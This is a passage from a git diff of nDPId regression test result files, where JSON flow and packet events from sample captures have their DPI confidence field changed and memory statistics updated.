@@ -4,10 +4,10 @@ 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620643422034,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620643422034,"pkt":"BBjWBrNaACWQ1Mz5CABFAAA8gCNAAEAGNQ\/AqALeaJpZadX0AbtP8LY3AAAAAKACchCFuAAAAgQFtAQCCAoBlw8kAAAAAAEDAwc="} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620643422162,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620643422162,"pkt":"ACWQ1Mz5BBjWBrNaCABFAAA8AABAADAGxTJomllpwKgC3gG71fRoLFRgT\/C2OKASbgBjmAAAAgQFjAQCCAqtfZhXAZcPJAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620643422162,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620643422162,"pkt":"BBjWBrNaACWQ1Mz5CABFAAA0gCRAAEAGNRbAqALeaJpZadX0AbtP8LY4aCxUYYAQAOWFsAAAAQEICgGXD0StfZhX"} 
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620643422034,"flow_last_seen":1620643422196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1620643422196,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
-01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":3579,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","server_names":"*.badssl.com,badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Walnut Creek, O=Lucas Garron Torres, CN=*.badssl.com","alpn":"http\/1.1","fingerprint":"18:45:B2:16:EF:D0:83:9A:18:51:A9:57:32:5D:A3:36:21:70:49:CB"}} -00708{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":21,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1620643422034,"flow_last_seen":1620643422754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":4010,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1620643422754,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 
+00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620643422034,"flow_last_seen":1620643422196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1620643422196,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
+01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":3579,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","server_names":"*.badssl.com,badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Walnut Creek, O=Lucas Garron Torres, CN=*.badssl.com","alpn":"http\/1.1","fingerprint":"18:45:B2:16:EF:D0:83:9A:18:51:A9:57:32:5D:A3:36:21:70:49:CB"}} +00708{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":21,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1620643422034,"flow_last_seen":1620643422754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":4010,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1620643422754,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 
00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":21,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","packets-captured":21,"packets-processed":21,"total-skipped-flows":0,"total-l4-payload-len":4010,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1620643422754} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 21/21 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878260 bytes -~~ total memory freed........: 5878260 bytes -~~ total allocations/frees...: 118143/118143 +~~ total memory allocated....: 6011894 bytes +~~ total memory freed........: 6011894 bytes +~~ total allocations/frees...: 120905/120905 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 478 chars ~~ json string max len.......: 1212 chars diff --git a/test/results/starcraft_battle.pcap.out b/test/results/starcraft_battle.pcap.out index 043d305d6..4528ee41f 100644 --- a/test/results/starcraft_battle.pcap.out +++ b/test/results/starcraft_battle.pcap.out 
@@ -2,26 +2,26 @@ 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1437389953643} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953643,"flow_last_seen":1437389953643,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1437389953643,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1437389953643,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1437389953643,"pkt":"IImEa8W6hCYVPnXECABFAABHZtpAAPMGok\/AHvxbwKgBZAG7DI12Mx9qhBzaXVAYAB\/+XQAAFwMDABrSe+rfqh1HHm09zJFdvf5O5AwaBTHDWE16Zg=="} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953643,"flow_last_seen":1437389953643,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1437389953643,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953643,"flow_last_seen":1437389953643,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1437389953643,"l3_proto":"ip4","src_ip":"192.30.252.91","dst_ip":"192.168.1.100","src_port":443,"dst_port":3213,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1437389953643,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1437389953643,"pkt":"hCYVPnXEIImEa8W6CABFAABLZZBAAIAGFpbAqAFkwB78WwyNAbuEHNpddjMfiVAYAP4NnAAAFwMDAB4AAAAAAAAAE\/\/36Dj9UZVbiDpZWB\/\/4P+7KR1Y0OI="} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953741,"flow_last_seen":1437389953741,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389953741,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1437389953741,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389953741,"pkt":"hCYVPnXEIImEa8W6CABFAABIX14AAIARVpTAqAFkwKgB\/uXCADUANEsbLmwBAAABAAAAAAAAAjkxAzI1MgIzMAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953741,"flow_last_seen":1437389953741,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389953741,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"91.252.30.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389953741,"flow_last_seen":1437389953741,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389953741,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"91.252.30.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1437389953742,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389953742,"pkt":"hCYVPnXEIImEa8W6CABFAABIX18AAIARVpPAqAFkwKgB\/uXCADUANO2f6I8BAAABAAAAAAAAAzEwMAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389953741,"flow_last_seen":1437389953742,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389953742,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"100.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389953741,"flow_last_seen":1437389953742,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389953742,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"100.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1437389953743,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1437389953743,"pkt":"IImEa8W6hCYVPnXECABFAABcAABAAEARtd7AqAH+wKgBZAA15cIASF7P6I+BgAABAAEAAAAAAzEwMAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAHADAAMAAEAAAAAAAgGbmItd2luAA=="} 
-00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953741,"flow_last_seen":1437389953743,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1437389953743,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"100.1.168.192.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389953741,"flow_last_seen":1437389953743,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1437389953743,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"100.1.168.192.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1437389953774,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389953774,"pkt":"IImEa8W6hCYVPnXECABFAAAoZttAAPMGom3AHvxbwKgBZAG7DI12Mx+JhBzagFAQAB8ujQAAAAAAAAAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389954123,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1437389954123,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1437389954123,"pkt":"IImEa8W6hCYVPnXECABFAAAohUoAAPMGdW9Q77oawKgBZAG7DZT7ZyHlrZYt91AU9s3jwgAAAAAAAAAA"} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1437389954543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389954543,"pkt":"hCYVPnXEIImEa8W6CABFAABIX2AAAIARVpLAqAFkwKgB\/uXPADUANOzD5FkBAAABAAAAAAAAAzI1NAExAzE2OAMxOTIHaW4tYWRkcgRhcnBhAAAMAAE="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"254.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"254.1.168.192.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1437389954543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1437389954543,"pkt":"hCYVPnXEIImEa8W6CABFAABIX2EAAIARVpHAqAFkwKgB\/uXPADUANAhuNT0BAAABAAAAAAAAAjI2AzE4NgMyMzkCODAHaW4tYWRkcgRhcnBhAAAMAAE="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389954543,"flow_last_seen":1437389954543,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1437389954543,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
